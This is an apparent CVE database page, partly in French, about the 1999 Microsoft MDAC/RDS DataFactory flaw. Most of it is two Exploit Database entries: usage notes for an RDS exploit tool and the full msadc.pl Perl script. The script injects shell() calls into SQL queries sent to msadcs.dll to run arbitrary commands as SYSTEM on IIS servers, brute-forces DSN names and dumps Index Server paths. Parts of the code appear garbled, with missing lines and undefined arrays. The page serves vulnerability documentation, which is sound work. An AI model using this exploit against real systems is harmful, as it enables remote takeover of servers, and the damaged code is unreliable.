Faiblesses connexes
Nom de la faiblesse |
Source |
CWE-264 |
Category : Permissions, Privileges, and Access Controls Weaknesses in this category are related to the management of permissions, privileges, and other security features that are used to perform access control. |
Métriques |
Score |
Gravité |
CVSS Vecteur |
Source |
V2 |
10 |
AV:N/AC:L/Au:N/C:C/I:C/A:C |
[email protected] |
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 19425
Date de publication : 1999-07-18 22h00 +00:00
Auteur : Wanderley J. Abreu Jr
EDB Vérifié : Yes
source: https://www.securityfocus.com/bid/529/info
MDAC (Microsoft Data Access Components) is a package used to integrate web and database services. It includes a component named RDS (Remote Data Services). RDS allows remote access via the internet to database objects through IIS. Both are included in a default installation of the Windows NT 4.0 Option Pack, but can be excluded via a custom installation.
RDS includes a component called the DataFactory object, which has a vulnerability that could allow any web user to:
--Obtain unauthorized access to unpublished files on the IIS server
--Use MDAC to tunnel ODBC requests through to a remote internal or external location, thereby obtaining access to non-public servers or effectively masking the source of an attack on another network.
The main risk in this vulnerability is the following:
--If the Microsoft JET OLE DB Provider or Microsoft DataShape Provider are installed, a user could use the shell() VBA command on the server with System privileges. (See the Microsoft JET Database Engine VBA Vulnerability for more information). These two vulnerabilities combined can allow an attacker on the Internet to run arbitrary commands with System level privileges on the target host.
--RDSExploit information:
How it Works:
       The Intent of RDS Exploit is Deliver Shell comands into the machine or Retrive some DATA from a ODBC valid conection.
1. Seting ODBC Conection:
First of all you will need to know some valid DSN, the UID (User ID) and Password. Put the information about the conection into "Connection Properties":
Data Source: The DSN Conection Name (it MUST be a registered DSN)
User ID: Login (it can be null sometimes)
Password: Password (it can be null sometimes)Â Â
Mode: The way you want to open the Table (Read Only or Read and Write)
You must follow the order above and don't forget the ; to separate the options
 It can be for instance a line like this:
"Data Source=AdvWorks;User ID=;Password=;Mode=Read|Write;"
2. SQL Comands:
Put into the "SQL Parameters" box the command line you want to deliver for example:
"SELECT * FROM Products"
3. Host:
 You MUST Enter the host like this http://server DON'T FORGET HTTP:// or it'll not work.
After all done, just click in the button "Retrieve Data" and see what happens =)
Exploit Database EDB-ID : 19424
Date de publication : 1999-07-18 22h00 +00:00
Auteur : rain forest puppy
EDB Vérifié : Yes
source: https://www.securityfocus.com/bid/529/info
MDAC (Microsoft Data Access Components) is a package used to integrate web and database services. It includes a component named RDS (Remote Data Services). RDS allows remote access via the internet to database objects through IIS. Both are included in a default installation of the Windows NT 4.0 Option Pack, but can be excluded via a custom installation.
RDS includes a component called the DataFactory object, which has a vulnerability that could allow any web user to:
--Obtain unauthorized access to unpublished files on the IIS server
--Use MDAC to tunnel ODBC requests through to a remote internal or external location, thereby obtaining access to non-public servers or effectively masking the source of an attack on another network.
The main risk in this vulnerability is the following:
--If the Microsoft JET OLE DB Provider or Microsoft DataShape Provider are installed, a user could use the shell() VBA command on the server with System privileges. (See the Microsoft JET Database Engine VBA Vulnerability for more information). These two vulnerabilities combined can allow an attacker on the Internet to run arbitrary commands with System level privileges on the target host.
msadc.pl exploit written and posted to bugtraq by Rain Forest Puppy.
--msadc.pl explanation:
msadc.pl looks for a common file to exploit, namely btcustmr.mdb .
msadc.pl instructions:
run perl -x msadc.pl
Command line switches (copied from rfp's post):
-h <ip or domain> this is the host to scan. You MUST either
use either -h or -R.
-d <value 0-?> this is the delay between connections.
Value is in number of seconds. I added
this because hammering the RDS components
caused the server to occasionally stop
responding :) Defaults to 1. Use -d 0
to disable.
-V Use VbBusObj instead of DataFactory to
run the queries. NOTE: please read the -N
information below as to suggestions for
checking if VbBusObj exists. VbBusObj
does not give good error reporting;
therefore it is quite possible to have
false positives (and false negatives).
Consider VbBusObj support 3 stages before
beta. Don't say I didn't warn you.
-v verbose. This will print the ODBC error
information. Really only for
troubleshooting purposes.
-e external dictionary file to use on step
5--the 'DSN dictionary guess' stage. The
file should just be plaintext, one DSN
name per line file with all the DSN names
you want to try. Quite honestly a normal
dictionary file won't do you much good.
You can probably do pretty damn well with
a few dozen or two good ones, like 'www',
'data', 'database', 'sql', etc.
-R resume. You can still specify -v or -d
with -R. This will cause the script to
read in rds.save and execute the command
on the last valid connection.
-N Use VbBusObj to try to get the machine's
NetBIOS name. It may return no name
if the VbBusObj is unavailable. I suggest
you use -N to see if VbBusObj exists (a
NetBIOS name will be returned if so)
before you use -V.
-X perform an Index Server table dump instead.
None of the other switches really apply
here, other than -v (although -d still
works, there's no need to slow down one
query). This dumps the root paths from
Index Server, which can be rather lengthy.
I suggest you pipe the output into a file.
Also, if there is a lot of return
information, this command may take a while
to complete. Be patient. And I don't
suggest you use this command more than
once a minute...it caused my P200 w/
128 RAM to stop answering requests, and
in general borked inetinfo.exe. If you do
decide to CONTROL-C during the middle of the
data download the script will save all
received data into a file called 'raw.out',
so you don't loose everything you've
already received. NOTE: this is the raw
data, which is in Unicode.
rfp submitted a version 2 of this exploit on October 10, 1999. New features include:
- UNC support. This has only been tested with Windows 95 shares...NT may
cause authentication wackiness. Use -u \\server\share\file.mdb.
Also, on unix boxen, don't forget you have to escape the '\', so
would look like \\\\server\\share\\file.mdb. Also have not tested
with Samba. Let me know if you have good/bad results.
- Win 95 support. Use -w to use command /c instead of cmd /c.
- Slimmed down the query process. Before it would query to determine if
it was using Access driver, then create a table called 'AZZ', and
then try to use this 'AZZ' table for the exploit. This left
obvious leftovers (tables named 'AZZ') on the server. Now it just
queries MSysModules firsthand, which cuts down the steps and stops
leaving evidence. However, this may not always work. Use the -c
switch for backwards compatibility (3 step process). I would run
normal, and if nothing works, try it again with the -c switch.
- Only run a certain step. Use the -s switch to specify which step to
run. For those of you itching to try the new UNC support, you
can run it immediately (normally it's step 5), by running:
./msadc.pl -h <host> -u <unc path> -s 5
NOTE ON SUCCESS: The script reports 'Success!' when it has issued a valid
SQL statement. 'Success!' does *NOT* mean that your command worked. If
they have MDAC 2.1+ shell commands are worthless, so the script will
report 'Success!' (it went through) but your command didn't run (MDAC 2.1
didn't interpret it). There's no return indication to know whether your
command worked or not. As with the ODBC commands, you're flying blind.
# MSADC/RDS 'usage' (aka exploit) script version 2
# by rain forest puppy
# - added UNC support, really didn't clean up code, but oh well
use Socket; use Getopt::Std;
getopts("e:vd:h:XRVNwcu:s:", \%args);
print "-- RDS smack v2 - rain forest puppy / ADM / wiretrip --\n";
if (!defined $args{h} && !defined $args{R}) {
print qq~
Usage: msadc.pl -h <host> { -d <delay> -X -v }
-h <host> = host you want to scan (ip or domain)
-d <seconds> = delay between calls, default 1 second
-X = dump Index Server path table, if available
-N = query VbBusObj for NetBIOS name
-V = use VbBusObj instead of ActiveDataFactory
-v = verbose
-e = external dictionary file for step 5
-u <\\\\host\\share\\file> = use UNC file
-w = Windows 95 instead of Windows NT
-c = v1 compatibility (three step query)
-s <number> = run only step <number>
Or a -R will resume a (v2) command session
~; exit;}
# config data
# we want 'wicca' first, because if step 2 made the DSN, it's ready to go
@dsns=("wicca", "AdvWorks", "pubs", "CertSvr", "CFApplications",
"cfexamples", "CFForums", "CFRealm", "cfsnippets", "UAM",
"banner", "banners", "ads", "ADCDemo", "ADCTest");
# this is sparse, because I don't know of many
@sysmdbs=( "\\catroot\\icatalog.mdb",
"\\system32\\certlog\\certsrv.mdb" ); #these are %systemroot%
@mdbs=( "\\cfusion\\cfapps\\cfappman\\data\\applications.mdb",
); #these are just \
$ip=$args{h}; $clen=0; $reqlen=0; $|=1; $target="";
if (defined $args{v}) { $verbose=1; } else {$verbose=0;}
if (defined $args{d}) { $delay=$args{d};} else {$delay=1;}
if(!defined $args{R}){ $target= inet_aton($ip)
|| die("inet_aton problems; host doesn't exist?");}
if (!defined $args{R}){ $ret = &has_msadc; }
if (defined $args{X}) { &hork_idx; exit; }
if (defined $args{N}) { &get_name; exit; }
if (defined $args{w}){$comm="command /c";} else {$comm="cmd /c";}
if (defined $args{R}) { &load; exit; }
print "Type the command line you want to run ($comm assumed):\n"
. "$comm ";
$in=<STDIN>; chomp $in;
$command="$comm " . $in ;
if (!defined $args{s} || $args{s}==1){
print "\nStep 1: Trying raw driver to btcustmr.mdb\n";
if (!defined $args{s} || $args{s}==2){
print "\nStep 2: Trying to make our own DSN...";
if (&make_dsn){ print "<<success>>\n"; sleep(3); } else {
print "<<fail>>\n"; }} # we need to sleep to let the server catchup
if (!defined $args{s} || $args{s}==3){
print "\nStep 3: Trying known DSNs...";
if (!defined $args{s} || $args{s}==4){
print "\nStep 4: Trying known .mdbs...";
if (!defined $args{s} || $args{s}==5){
if (defined $args{u}){
print "\xStep 5: Trying UNC...";
&use_unc; } else { "\nNo -u; Step 5 skipped.\n"; }}
if (!defined $args{s} || $args{s}==6){
if (defined $args{e}){
print "\nStep 6: Trying dictionary of DSN names...";
&dsn_dict; } else { "\nNo -e; Step 6 skipped.\n"; }}
print "\n\nNo luck, guess you'll have to use a real hack, eh?\n";
sub sendraw { # this saves the whole transaction anyway
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,80,$target)){
open(OUT,">raw.out"); my @in;
select(S); $|=1; print $pstr;
while(<S>){ print OUT $_; push @in, $_;
print STDOUT "." if(defined $args{X});}
close(OUT); select(STDOUT); close(S); return @in;
} else { die("Can't connect...\n"); }}
sub make_header { # make the HTTP request
my $aa, $bb;
if (defined $args{V}){
} else {
POST /msadc/msadcs.dll/$aa HTTP/1.1
Host: $ip
Content-Length: $clen
Connection: Keep-Alive
Content-Type: multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=$bb
Content-Type: application/x-varg
Content-Length: $reqlen
return $msadc;}
sub make_req { # make the RDS request
my ($switch, $p1, $p2)=@_;
my $req=""; my $t1, $t2, $query, $dsn;
if ($switch==1){ # this is the btcustmr.mdb query
$query="Select * from Customers where City='|shell(\"$command\")|'";
$dsn="driver={Microsoft Access Driver (*.mdb)};dbq=" .
$p1 . ":\\" . $p2 . "\\help\\iis\\htm\\tutorial\\btcustmr.mdb;";}
elsif ($switch==2){ # this is general make table query
$query="create table AZZ (B int, C varchar(10))";
elsif ($switch==3){ # this is general exploit table query
$query="select * from AZZ where C='|shell(\"$command\")|'";
elsif ($switch==4){ # attempt to hork file info from index server
$query="select path from scope()";
elsif ($switch==5){ # bad query
elsif ($switch==6){ # this is table-independant query (new)
$query="select * from MSysModules where name='|shell(\"$command\")|'";
$t1= make_unicode($query);
$t2= make_unicode($dsn);
if(defined $args{V}) { $req=""; } else {$req = "\x02\x00\x03\x00"; }
$req.= "\x08\x00" . pack ("S1", length($t1));
$req.= "\x00\x00" . $t1 ;
$req.= "\x08\x00" . pack ("S1", length($t2));
$req.= "\x00\x00" . $t2 ;
return $req;}
sub make_unicode { # quick little function to convert to unicode
my ($in)=@_; my $out;
for ($c=0; $c < length($in); $c++) { $out.=substr($in,$c,1) . "\x00"; }
return $out;}
sub rdo_success { # checks for RDO return success (this is kludge)
my (@in) = @_; my $base=content_start(@in);
return 1 if( $in[$base+10]=~/^\x09\x00/ );}
return 0;}
sub make_dsn { # this (tries to) make a DSN for us
print "\nMaking DSN: ";
foreach $drive (@drives) {
print "$drive: ";
my @results=sendraw("GET /scripts/tools/newdsn.exe?driver=Microsoft\%2B" .
. $drive . "\%3A\%5Csys.mdb\&newdb=CREATE_DB\&attr= HTTP/1.0\n\n");
$results[0]=~m#HTTP\/([0-9\.]+) ([0-9]+) ([^\n]*)#;
return 0 if $2 eq "404"; # not found/doesn't exist
if($2 eq "200") {
foreach $line (@results) {
return 1 if $line=~/<H2>Datasource creation successful<\/H2>/;}}
} return 0;}
sub verify_exists {
my ($page)=@_;
my @results=sendraw("GET $page HTTP/1.0\n\n");
return $results[0];}
sub try_btcustmr {
foreach $dir (@sysdirs) {
print "$dir -> "; # fun status so you can see progress
foreach $drive (@drives) {
print "$drive: "; # ditto
$reqlen=length( make_req(1,$drive,$dir) ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(1,$drive,$dir));
if (rdo_success(@results)){print "Success!\n";
else { verbose(odbc_error(@results)); funky(@results);}} print "\n";}}
sub odbc_error {
my (@in)=@_; my $base;
my $base = content_start(@in);
if($in[$base]=~/application\/x-varg/){ # it *SHOULD* be this
$in[$base+4]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g;
$in[$base+5]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g;
$in[$base+6]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g;
return $in[$base+4].$in[$base+5].$in[$base+6];}
print "\nNON-STANDARD error. Please sent this info to rfp\@wiretrip.net:\n";
print "$in : " . $in[$base] . $in[$base+1] . $in[$base+2] . $in[$base+3] .
$in[$base+4] . $in[$base+5] . $in[$base+6]; exit;}
sub verbose {
my ($in)=@_;
return if !$verbose;
print STDOUT "\n$in\n";}
sub save {
my ($p1)=@_; my $ropt="";
open(OUT, ">rds.save") || print "Problem saving parameters...\n";
if (defined $args{c}){ $ropt="c ";}
if (defined $args{V}){ $ropt.="V ";}
if (defined $args{w}){ $ropt.="w ";}
print OUT "v2\n$ip\n$ropt\n$p1\n";
close OUT;}
sub load {
my ($action)=@_;
my @p; my $drvst="driver={Microsoft Access Driver (*.mdb)};";
open(IN,"<rds.save") || die("Couldn't open rds.save\n");
@p=<IN>; close(IN);
die("Wrong rds.save version") if $p[0] ne "v2\n";
$ip="$p[1]"; $ip=~s/\n//g;
$target= inet_aton($ip) || die("inet_aton problems");
print "Resuming to $ip ...";
@switches=split(/ /,$p[2]);
foreach $switch (@switches) {
if (defined $args{w}){$comm="command /c";} else {$comm="cmd /c";}
print "Type the command line you want to run ($comm assumed):\n"
. "$comm ";
$in=<STDIN>; chomp $in;
$command="$comm " . $in ;
$torun="$p[3]"; $torun=~s/\n//g;
$args{'c'}="1";} # this is a kludge to make it work
if($torun=~/^dbq/){ $torun=$drvst.$torun; }
print "Success!\n";} else { print "failed\n"; }
sub create_table {
return 1 if (!defined $args{c});
return 1 if (defined $args{V});
my ($in)=@_;
$reqlen=length( make_req(2,$in,"") ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(2,$in,""));
return 1 if rdo_success(@results);
my $temp= odbc_error(@results); verbose($temp);
return 1 if $temp=~/Table 'AZZ' already exists/;
return 0;}
sub known_dsn {
foreach $dSn (@dsns) {
print ".";
next if (!is_access("DSN=$dSn"));
print "$dSn: Success!\n"; save ("dsn=$dSn"); exit; }}} print "\n";}
sub is_access {
my ($in)=@_;
return 1 if (!defined $args{c});
return 1 if (defined $args{V});
$reqlen=length( make_req(5,$in,"") ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(5,$in,""));
my $temp= odbc_error(@results);
verbose($temp); return 1 if ($temp=~/Microsoft Access/);
return 0;}
sub run_query {
my ($in)=@_; my $req;
if (defined $args{c}){$req=3;} else {$req=6;}
$reqlen=length( make_req($req,$in,"") ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req($req,$in,""));
return 1 if rdo_success(@results);
my $temp= odbc_error(@results); verbose($temp);
return 0;}
sub known_mdb {
my @drives=("c","d","e","f","g");
my @dirs=("winnt","winnt35","winnt351","win","windows");
my $dir, $drive, $mdb;
my $drv="driver={Microsoft Access Driver (*.mdb)}; dbq=";
foreach $drive (@drives) {
foreach $dir (@sysdirs){
foreach $mdb (@sysmdbs) {
print ".";
if(run_query($drv . $drive . ":\\" . $dir . $mdb)){
print "$mdb: Success!\n"; save ("dbq=".$drive .":\\".$dir.$mdb); exit;
foreach $drive (@drives) {
foreach $mdb (@mdbs) {
print ".";
print "$mdb: Success!\n"; save ("dbq=".$drive.":".$mdb); exit;
sub hork_idx {
print "\nAttempting to dump Index Server tables...\n";
print " NOTE: Sometimes this takes a while, other times it stalls\n\n";
$reqlen=length( make_req(4,"","") ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(4,"",""));
if (rdo_success(@results)){
my $max=@results; my $c; my %d;
for($c=19; $c<$max; $c++){
$results[$c]=~s/[^a-zA-Z0-9:~ \\\._]{1,40}/\n/g;
$results[$c]=~s/[^a-zA-Z0-9:~ \\\._\n]//g;
$results[$c]=~/([a-zA-Z]\:\\)([a-zA-Z0-9 _~\\]+)\\/;
foreach $c (keys %d){ print "$c\n"; }
} else {print "Index server not installed/query failed\n"; }}
sub dsn_dict {
open(IN, "<$args{e}") || die("Can't open external dictionary\n");
$hold=$_; $hold=~s/[\r\n]//g; $dSn="$hold"; print ".";
next if (!is_access("DSN=$dSn"));
print "Success!\n"; save ("dsn=$dSn"); exit; }}}
print "\n"; close(IN);}
sub content_start { # this will take in the server headers
my (@in)=@_; my $c;
for ($c=1;$c<500;$c++) { # assume there's less than 500 headers
if($in[$c] =~/^\x0d\x0a/){
if ($in[$c+1]=~/^HTTP\/1.[01] [12]00/) { $c++; }
else { return $c+1; }}}
return -1;} # it should never get here actually
sub funky {
my (@in)=@_; my $error=odbc_error(@in);
if($error=~/ADO could not find the specified provider/){
print "\nServer returned an ADO miscofiguration message\nAborting.\n";
if($error=~/A Handler is required/){
print "\nServer has custom handler filters (they most likely are patched)\n";
if($error=~/specified Handler has denied Access/){
print "\nADO handlers denied access (they most likely are patched)\n";
if($error=~/server has denied access/){
print "\nADO handlers denied access (they most likely are patched)\n";
sub has_msadc {
my @results=sendraw("GET /msadc/msadcs.dll HTTP/1.0\n\n");
my $base=content_start(@results);
return if($results[$base]=~/Content-Type: application\/x-varg/);
my @s=grep("Server: ",@results);
if($s[0]!~/IIS/){ print "Doh! They're not running IIS.\n$s[0]\n" }
else { print "/msadc/msadcs.dll was not found.\n";}
sub use_unc {
$driverline="driver={Microsoft Access Driver (*.mdb)};dbq=";
print "Your UNC path sucks. You need the following format:\n".
"\\server(ip preferable)\share\some-file.mdb\n\n"; exit; }
print "Success!\n"; save ("dbq=".$uncpath); exit;}}
sub get_name { # this was added last minute
my $msadc=<<EOT
POST /msadc/msadcs.dll/VbBusObj.VbBusObjCls.GetMachineName HTTP/1.1
Host: $ip
Content-Length: 126
Connection: Keep-Alive
Content-Type: multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=0
; $msadc=~s/\n/\r\n/g;
my @results=sendraw($msadc);
my $base=content_start(@results);
print "Machine name: $results[$base+6]\n";}
# special greets to trambottic, hex_edit, vacuum (technotronic), all #!adm,
# #!w00w00 & #rhino9 (that's a lot of people, and they are all very elite and
# good friends!), wiretrip, l0pht, nmrc & all of phrack
# thumbs up to packetstorm, hackernews, phrack, securityfocus, ntsecadvice
# I wish I could really name everyone, but I can't. Don't feel slighted if
# your not on the list... :)
Products Mentioned
Configuraton 0
Microsoft>>Data_access_components >> Version 1.5
Microsoft>>Data_access_components >> Version 2.0
Microsoft>>Data_access_components >> Version 2.1
Microsoft>>Index_server >> Version 2.0
Microsoft>>Internet_information_server >> Version 3.0
Microsoft>>Internet_information_server >> Version 4.0
Microsoft>>Site_server >> Version 3.0